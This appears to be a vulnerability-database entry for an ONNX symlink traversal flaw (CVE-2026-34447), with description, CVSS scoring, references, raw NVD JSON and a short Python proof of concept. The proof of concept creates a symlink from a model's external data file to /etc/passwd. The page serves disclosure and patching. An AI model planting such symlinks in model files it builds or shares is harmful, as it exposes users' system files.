CVE-2026-34447

Description

Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is a symlink traversal vulnerability in external data loading allows reading files outside the model directory. This issue has been patched in version 1.21.0.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:onnx:*:*:*:*:*:*:*:* - VULNERABLE

Open Neural Network Exchange (ONNX) < 1.21.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os
import onnx

# PoC for CVE-2026-34447: ONNX Symlink Traversal
# This script demonstrates how a symlink can be used to read arbitrary files.

# Step 1: Create a directory for the malicious model
os.makedirs("malicious_model", exist_ok=True)
os.chdir("malicious_model")

# Step 2: Create a symlink pointing to a sensitive file (e.g., /etc/passwd)
# The external data parser will follow this link
target_file = "/etc/passwd"
symlink_name = "external_data.bin"

try:
    os.symlink(target_file, symlink_name)
    print(f"[+] Created symlink '{symlink_name}' -> '{target_file}'")
except OSError as e:
    print(f"[-] Failed to create symlink: {e}")

# Step 3: In a real exploit, an ONNX model file would be created/modified
# to reference 'external_data.bin'. When the victim loads the model,
# ONNX reads the file content through the symlink.
print("[+] PoC setup complete. If a model references 'external_data.bin', /etc/passwd will be read.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34447
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34447
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34447/
[4] VulDB https://vuldb.com/cve/CVE-2026-34447
[5] https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34447", "sourceIdentifier": "[email protected]", "published": "2026-04-01T18:16:30.810", "lastModified": "2026-04-15T14:45:48.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is a symlink traversal vulnerability in external data loading allows reading files outside the model directory. This issue has been patched in version 1.21.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:onnx:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.21.0", "matchCriteriaId": "D94F43D7-D50D-4698-B07D-215EBBAB63F2"}]}]}], "references": [{"url": "https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}